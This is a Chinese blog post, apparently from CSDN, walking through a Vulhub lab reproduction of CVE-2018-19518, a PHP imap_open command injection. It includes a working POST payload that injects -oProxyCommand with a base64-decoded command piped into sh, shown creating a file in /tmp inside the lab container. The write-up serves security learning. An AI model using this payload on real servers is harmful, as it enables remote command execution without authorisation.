P1 利用Vulnhub复现漏洞 - PHP imap 远程命令执行漏洞(CVE-2018-19518)

最新推荐文章于 2024-04-28 00:03:33 发布
最新推荐文章于 2024-04-28 00:03:33 发布
阅读量461 收藏 2
点赞数
分类专栏: # 漏洞复现 文章标签: linux 安全 php imap 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44519789/article/details/115012886
版权

大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
今天更新的是:

创建时间:2021年3月19日
软件: MindMaster Pro 、Burp Suite Pro 、火狐浏览器

PHP imap 远程命令执行漏洞(CVE-2018-19518)

Vulnhub 复现

漏洞原理

  • php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。

  • 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。

  • 参考链接:

  • imap_open允许通过邮箱参数运行任意的Shell命令

  • PHP_imap_open_exploit

环境准备

  • 打开漏洞存放路径:cd /home/vulhub/vulhub/php/CVE-2018-19518

-

  • 搭建及运行漏洞环境:docker-compose up -d

这里如果安装失败的话重启虚拟机。

在这里插入图片描述

  • 环境启动后,访问http://your-ip:8080即可查看web页面。Web功能是测试一个邮件服务器是否能够成功连接,需要填写服务器地址、用户名和密码。

- 在这里插入图片描述

  • 注册提交抓个包看一下:

-

  • 根据给的POC制作POST包发送验证
 hostname=x+-oProxyCommand%3decho%09  XXXXXXXXX下面指令的64为编码XXXXXXXXX|base64%09-d|sh}&username=111&password=222

echo1234567890>/tmp/自定义文件夹
  • 第一行右侧选择 URL进行分割开来

在这里插入图片描述

  • 这里定义自己想要转换成base64解码

在这里插入图片描述

在这里插入图片描述

  • 查看执行docker-compose exec web bash进入容器,可见/tmp/123456已成功创建:

在这里插入图片描述

各位路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。

每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !
在这里插入图片描述

把握现在 ,展望未来 ,加油 !

由于水平有限 ,写的难免会有些不足之处 ,恳请各位大佬不吝赐教 !

在下小黄
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP imap 远程命令执行漏洞CVE-2018-19518)
0xSec
12-27 1080
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议(IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议。IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
CVE-2018-19518 imap_open()
heySister
03-22 2923
CVE-2018-19518 前几天时候无聊翻了一下安恒杯2月的月赛题目,看到有一道是用了跟imap_open()这个函数有关的webshell,去查了一下,发是个CVE。emm…刚开始查到的是freebuf上面的一个文章,还有另外一个一模一样的,也不知道是谁抄谁,还是都是翻译的国外的
[Vulhub] PHP imap远程命令执行漏洞CVE-2018-19518)
weixin_45605352的博客
05-08 1592
0x01 预备知识 PHPimap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 如果启用了
cve-2018-19518漏洞
最新发布
m0_74402888的博客
04-28 525
php imap扩展用户在php执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞
PHP imap 远程命令执行漏洞CVE-2018-19518)
大方子
08-04 4377
受影响版本 Ubuntuhttps://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-19518.html Debianhttps://security-tracker.debian.org/tracker/CVE-2018-19518 Red Hathttps://access.redhat.com/security/...
远程执行代码漏洞(CVE-2018-0886)漏洞
08-21
CVE-2018-0886 CVE-2018-0886 Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886) windows安全漏洞,亲测有效
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
PHP--远程命令执行漏洞CVE-2018-19518
从不专注的人的博客
06-28 570
目录漏洞介绍漏洞进入容器移除环境 漏洞介绍 -php imap扩展用户在php执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令-debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。 -ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行
PHP imap 远程命令执行漏洞CVE-2018-19518)
thelostworld
05-12 726
实战项目遇到:做一下,本地靶机测试。看看有没有利用方式一、漏洞描述php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。二、漏洞环境https://github.com/vulhub/vu
PHP imap 远程命令执行漏洞 CVE-2018-19518 漏洞
ADummy的博客
02-25 287
PHP imap 远程命令执行漏洞CVE-2018-19518) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令
vulhub-CVE-2018-1273远程命令执行漏洞
m0_62008601的博客
09-23 1288
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
PHP imap远程命令执行,CVE-2018-19518:PHP imap_open函数任意命令执行漏洞
weixin_34363294的博客
04-01 241
参考链接https://www.freebuf.com/vuls/192712.html漏洞描述PHPimap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功能并且rsh命令是ssh命令的符号链接,则攻击者可以通过向目标系...
P3 利用Vulnhub漏洞 - Apache SSI 远程命令执行漏洞
在下小黄的博客
03-19 471
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P3 利用Vulnhub漏洞 - Apache SSI 远程命令执行漏洞 往期检索:程序设计学习笔记——目录 创建时间:2021年3月19日 软件: MindMaster Pro 、Burp Suite Pro 、火狐浏览器 Apache SSI 远程命令执行漏洞Vulnhub 官方漏洞原理环境准备漏洞 Vulnhub 官方 Apache SSI 远程命令执行漏洞 漏洞原理
CVE-2018-19518- imap 远程命令执行漏洞分析
lyy0xfff的博客
08-03 2386
CVE-2018-19518 IMAP 远程命令执行漏洞分析 0x00 漏洞介绍 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubu
cve-2022-30190 msdt远程代码执行漏洞
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

在下小黄

ღ给个赞 是对小黄最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值